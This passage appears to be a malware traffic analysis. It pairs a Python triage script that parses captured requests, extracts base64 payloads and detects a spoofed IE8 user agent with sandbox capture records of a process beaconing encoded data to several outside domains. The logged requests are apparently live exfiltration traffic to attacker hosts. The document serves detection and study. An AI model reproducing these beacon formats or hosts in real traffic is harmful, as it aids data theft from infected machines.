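B64_32 = "5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q="
B64_33 = "rXgWPg4TpnazeBq+3R+mHlcL7VYGPRtTqy+IKzz612qEJUhVJINnnw7GAlpMMbT1YuTYBhBw9hrIjPAy5FPJ/nSkTMojcZ8nKSfnYhc5iBt6j3Oiam5ioGuQ+B8FQSzE/69PREREvwhbjme48wjLWvvz2RnPPF7n7h3DPbYPl2BAG85Fu7GK283U4pXIaLCmMg=="
B64_34 = "rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1AyEK0xVIJNngw7GPFpDD7TqYuenBg9w9iXIjOwy5ybIlXScKcotYZ8nKSfnYhhciCd6iH+iL35lgmuT7B8FBCz+/68aRHUhvzJbjnu49lPIcvu4oRmkGki7hSGQNJEKgFxxH6of/Kndk8Tnlue8XI/vXlXrheK2/OCYNlyd86NbZbE="

def build_post(host, path, b64):
    """Reassemble a POST exactly as sessions 30, 33 and 34 appear on the wire."""
    body = "kf-HBx=" + b64
    return (f"POST {path} HTTP/1.1\nHost: {host}\nAccept: {ACCEPT}\nAccept-Language: en-US\n"
            f"Accept-Encoding: gzip, deflate, br\nOrigin: http://{host}\nReferer: http://{host}{path}\n"
            "Connection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\n"
            f"Content-Length: {len(body)}\nUser-Agent: {IE8_UA}\n\n{body}")

REQ_30 = build_post("www.nad5.shop", "/moqb/", B64_30)
REQ_33 = build_post("www.luxe.guru", "/esft/", B64_33)
REQ_34 = build_post("www.luxe.guru", "/esft/", B64_34)
# Session 32: the same field carried in the query string of a GET.
REQ_32 = (f"GET /moqb/?oFA=_z5x9B5&kf-HBx={B64_32} HTTP/1.1\nHost: www.nad5.shop\nAccept: {ACCEPT}\n"
          f"Accept-Language: en-US\nConnection: close\nUser-Agent: {IE8_UA}\n\n")
# Constructed negative control: Chrome also offers AVIF, WebP and Brotli, and its UA says so.
REQ_BENIGN = (f"GET /index.html HTTP/1.1\nHost: www.example.com\nAccept: {ACCEPT}\n"
              "Accept-Encoding: gzip, deflate, br\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\n\n")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": url.query, "headers": headers, "body": body}

def extract_payload(req):
    """(field, raw base64) of the longest form field in a POST body or GET query. Split by
    hand: parse_qsl would turn the '+' of the base64 alphabet into spaces."""
    source = req["body"] if req["method"] == "POST" else req["query"]
    fields = [pair.partition("=") for pair in source.split("&") if pair]
    if not fields:
        return None, ""
    name, _, value = max(fields, key=lambda f: len(f[2]))
    return name, value

def spoofed_browser(req):
    """IE 8 on Windows 7 never advertised AVIF, WebP or Brotli; a request claiming MSIE
    while offering any of them was built from a hard-coded header template."""
    h = req["headers"]
    encodings = [t.strip() for t in h.get("accept-encoding", "").split(",")]
    modern = ("image/avif" in h.get("accept", "") or "image/webp" in h.get("accept", "")
              or "br" in encodings)
    return "MSIE " in h.get("user-agent", "") and modern

def triage(raw):
    """Summarise one captured request: destination, carrier field, payload sizes, header check."""
    req = parse_request(raw)
    field, value = extract_payload(req)
    return {"host": req["headers"].get("host"), "method": req["method"], "path": req["path"],
            "field": field, "b64_len": len(value), "plain_len": len(base64.b64decode(value)),
            "spoofed_ua": spoofed_browser(req)}

def shared_prefix(b64_a, b64_b):
    """Leading base64 characters two payloads have in common."""
    return os.path.commonprefix([b64_a, b64_b])

def same_position_matches(b64_a, b64_b):
    """Offsets where two decoded payloads hold the same byte. Under one keystream the
    ciphertexts agree exactly where the plaintexts agree, so a fixed header shows as a
    run of matches from offset 0 and shared field values as clusters further in;
    unrelated bytes coincide only about once in 256 positions."""
    a, b = base64.b64decode(b64_a), base64.b64decode(b64_b)
    return [i for i, (x, y) in enumerate(zip(a, b)) if x == y]

if __name__ == "__main__":
    for sid, raw in (("30", REQ_30), ("32", REQ_32), ("33", REQ_33), ("34", REQ_34)):
        print(sid, triage(raw))
    print("33/34 shared prefix:", shared_prefix(B64_33, B64_34))
    print("33/34 equal bytes at offsets:", same_position_matches(B64_33, B64_34))
```

The decoded sizes line up with the report: the 223-byte bodies of sessions 30 and 34 carry 161 bytes of ciphertext, session 33 carries 145, and the GET carries 89 in its query string. The two www.luxe.guru payloads agree on their first 9 bytes and again at offsets 70 to 75, where the base64 text is identical in both captures; treat such runs as the place to look for a fixed header or repeated field once the cipher is known, not as proof of a specific algorithm.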

Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 50042 | Destination IP: 52.20.84.62 | Destination Port: 80 | PID: 1376 | Process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:04:06.316636086 CEST | Bytes transferred: 10883 | Direction: OUT | Data:
POST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 36 45 4a 48 70 56 4a 71 6c 6e 68 77 37 47 47 6c 70 41 44 37 54 6a 59 75 57 6a 42 67 78 67 39 6e 54 49 78 38 34 79 2f 48 6e 49 77 48 53 63 43 38 6f 73 63 5a 38 49 4b 53 76 6a 59 68 52 63 69 43 64 36 69 45 6d 69 4c 6d 35 6c 6d 6d 75 51 2b 42 38 42 51 53 79 77 2f 36 31 74 52 45 35 55 6f 43 70 62 67 48 2b 34 36 54 62 49 51 76 75 36 38 78 6d 38 47 6b 65 53 68 53 4b 63 4e 49 77 67 67 43 42 78 47 50 5a 56 73 35 50 2b 7a 39 62 6c 32 50 7a 63 58 35 50 33 63 6c 4b 56 69 50 44 70 69 71 65 46 50 6d 54 71 6f 49 6c 35 43 64 75 4d 4e 2f 4f 72 6f 37 49 75 62 37 42 5a 30 6d 6a 52 47 67 74 30 6f 30 43 66 7a 6b 52 5a 4e 31 79 62 4f 35 4a 69 4e 36 4b 70 77 39 54 76 4b 6f 46 33 6d 2f 67 34 68 73 42 43 77 66 79 58 38 6f 44 42 67 64 55 41 2b 43 44 65 4c 33 2b 6d 4b 65 43 48 79 4f 4e 37 7a 4d 63 71 35 64 7a 49 75 65 65 6d 75 70 2f 48 6b 77 43 43 36 79 55 53 55 4e 6f 52 63 59 47 [TRUNCATED]
Data Ascii: kf-HBx= [TRUNCATED]
Oct 24, 2024 08:04:06.975811005 CEST | 705 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:06 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50043 | 52.20.84.62 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:08.901424885 CEST | 518 | OUT | GET /esft/?kf-HBx=mVI2MUxphHC6Uw3f9xz7cF5W0X1TXhBjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql1KfONw8K+kkYDnWB0Nzinc0hknaPW1TnzQ=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:04:09.582313061 CEST | 357 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:09 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 168
                                                                                                                                  Connection: close
                                                                                                                                  Location: http://www.luxe.guru/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:14.669733047 CEST | 805 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4c 62 58 39 6c 6d 39 6f 38 76 44 4f 44 77 41 61 44 62 64 55 39 63 50 30 73 33 54 78 53 79 64 34 42 42 58 49 52 74 47 37 39 59 78 62 4d 6a 58 65 53 64 2b 49 79 49 38 69 32 65 36 6f 6d 68 43 45 36 55 71 66 76 77 5a 75 70 41 53 58 39 79 42 33 71 4f 48 2b 72 61 44 6d 54 4a 53 57 74 73 46 45 76 55 52 4a 59 2b 4a 7a 6a 59 38 53 37 65 35 7a 72 42 76 77 47 61 6c 72 56 48 33 72 68 7a 58 41 53 6f 6f 72 69 68 45 4c 73 70 47 47 4a 75 39 44 67 37 6e 67 64 6c 44 38 4a 5a 63 63 58 68 4e 66 53 4c 33 4a 30 6b 6d 6f 32 2b 73 66 56 32 4f 35 59 54 57 74 75 77 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=ZEfNzSM6YnFyLbX9lm9o8vDODwAaDbdU9cP0s3TxSyd4BBXIRtG79YxbMjXeSd+IyI8i2e6omhCE6UqfvwZupASX9yB3qOH+raDmTJSWtsFEvURJY+JzjY8S7e5zrBvwGalrVH3rhzXASoorihELspGGJu9Dg7ngdlD8JZccXhNfSL3J0kmo2+sfV2O5YTWtuw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50045 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:17.223931074 CEST | 825 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 31 34 50 45 72 49 44 76 2b 37 6f 59 78 62 45 44 58 62 4d 74 2b 50 79 49 77 71 32 63 75 6f 6d 68 47 45 36 56 61 66 76 44 42 74 72 51 53 76 68 79 41 78 33 2b 48 2b 72 61 44 6d 54 4e 36 34 74 73 74 45 73 6b 42 4a 5a 66 4a 79 70 34 38 52 7a 2b 35 7a 38 78 76 30 47 61 6b 62 56 44 2b 77 68 78 66 41 53 74 4d 72 69 77 45 4d 35 5a 47 41 55 2b 38 38 68 34 61 76 44 51 4f 78 4f 36 30 2b 5a 43 5a 39 58 4e 6d 54 6c 56 48 2f 6b 2b 49 73 49 78 48 4e 56 51 72 6b 31 33 59 66 44 6a 4e 51 50 68 7a 71 49 45 36 58 67 61 47 50 49 7a 59 3d
                                                                                                                                  Data Ascii: kf-HBx=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk14PErIDv+7oYxbEDXbMt+PyIwq2cuomhGE6VafvDBtrQSvhyAx3+H+raDmTN64tstEskBJZfJyp48Rz+5z8xv0GakbVD+whxfAStMriwEM5ZGAU+88h4avDQOxO60+ZCZ9XNmTlVH/k+IsIxHNVQrk13YfDjNQPhzqIE6XgaGPIzY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50046 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:19.763864994 CEST | 10907 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 39 34 50 32 54 49 52 4f 2b 37 75 6f 78 62 62 7a 58 61 4d 74 2b 53 79 49 6f 75 32 63 69 43 6d 6e 61 45 36 33 53 66 70 32 31 74 68 51 53 76 35 79 41 68 71 4f 47 6d 72 5a 72 36 54 4a 57 34 74 73 74 45 73 69 39 4a 50 2b 4a 79 6d 59 38 53 37 65 35 30 72 42 76 4d 47 62 4e 6a 56 44 36 67 6d 41 2f 41 63 74 63 72 6c 47 77 4d 37 35 47 43 58 2b 38 6b 68 34 58 76 44 51 36 58 4f 37 41 45 5a 44 68 39 57 6f 58 2f 39 46 44 6d 37 66 4d 50 56 67 71 72 56 42 43 39 78 33 70 6e 4a 57 4a 72 62 7a 44 59 54 55 76 46 37 66 71 5a 66 54 62 4a 6a 54 6d 30 4d 67 59 6b 4c 66 53 31 4c 73 71 72 67 6f 6f 58 30 61 4a 62 41 49 6a 41 6f 66 59 56 36 41 61 5a 4c 55 49 45 62 64 38 4a 38 61 63 54 4f 75 43 71 77 65 7a 41 7a 79 70 74 44 7a 54 69 61 4f 43 4d 59 32 6b 46 35 65 38 30 50 66 38 63 43 46 38 71 2f 64 4a 6f 6a 59 67 31 61 4a 4a 65 6f 79 59 54 35 2f 62 65 45 74 45 69 54 2f 31 45 2f 76 6f [TRUNCATED]
Data Ascii: kf-HBx= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:22.324640036 CEST | 526 | OUT | GET /frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:04:23.949486017 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 55 47 33 74 77 6c 31 52 54 57 49 43 50 36 61 2b 73 6e 4d 72 36 64 71 56 43 68 59 52 4e 62 46 30 34 74 66 39 6a 6b 32 7a 4a 7a 52 45 4c 31 48 46 45 66 65 4d 33 64 68 65 47 68 58 76 5a 4a 61 32 78 65 6b 6c 67 4a 57 36 6e 79 79 35 39 48 2b 46 70 78 4e 52 79 67 65 55 37 53 31 4f 7a 62 75 75 73 70 6e 53 42 6f 2b 70 72 4c 38 4d 68 77 63 46 62 75 55 69 6b 5a 63 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 142.250.186.83 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:29.277343988 CEST | 805 | OUT | POST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 77 78 7a 75 77 73 58 52 6b 59 53 70 54 52 68 6c 6a 33 59 44 31 44 6e 4a 4c 4b 6d 57 32 4d 52 35 71 50 79 67 34 46 35 78 70 32 52 6a 78 41 6f 68 68 6d 57 36 58 4e 48 58 34 71 77 6e 61 52 76 30 4d 62 65 55 77 54 70 39 63 4f 66 72 34 67 42 35 62 78 39 58 68 72 72 65 79 50 77 55 56 57 2f 4d 77 7a 48 41 73 75 30 53 79 7a 55 49 78 68 33 52 4e 56 2b 41 30 33 62 49 67 78 53 32 67 59 30 6a 76 4b 39 4d 74 77 72 65 70 4c 4c 30 50 48 6c 6f 2b 39 64 6b 51 34 76 47 62 6b 5a 46 75 75 44 73 75 56 54 71 31 4a 6e 50 50 62 4b 52 42 44 4c 79 32 4b 49 75 65 41 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=cI34pYOAGglcwxzuwsXRkYSpTRhlj3YD1DnJLKmW2MR5qPyg4F5xp2RjxAohhmW6XNHX4qwnaRv0MbeUwTp9cOfr4gB5bx9XhrreyPwUVW/MwzHAsu0SyzUIxh3RNV+A03bIgxS2gY0jvK9MtwrepLL0PHlo+9dkQ4vGbkZFuuDsuVTq1JnPPbKRBDLy2KIueA==
Oct 24, 2024 08:04:30.249777079 CEST | 407 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:30 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 142.250.186.83 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:04:31.896152020 CEST | 825 | OUT | POST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 6c 35 71 75 43 67 37 45 35 78 71 32 52 6a 2b 67 70 72 6c 6d 57 68 58 4e 43 6b 34 75 30 6e 61 52 72 30 4d 62 4f 55 7a 67 42 2b 54 2b 66 74 2b 67 42 37 66 78 39 58 68 72 72 65 79 50 31 78 56 58 58 4d 77 41 76 41 2b 37 41 56 38 54 55 58 79 68 33 52 4a 56 2b 45 30 33 61 74 67 77 4f 4d 67 61 38 6a 76 4b 74 4d 74 68 72 5a 7a 62 4c 79 44 58 6b 68 2b 73 34 39 65 49 69 31 54 32 64 2b 78 4f 48 67 76 54 43 77 6b 34 47 59 64 62 75 69 63 45 43 47 37 4a 31 6e 46 4b 4f 53 48 47 78 6b 4a 79 76 78 62 53 47 57 34 31 7a 37 4d 33 63 3d
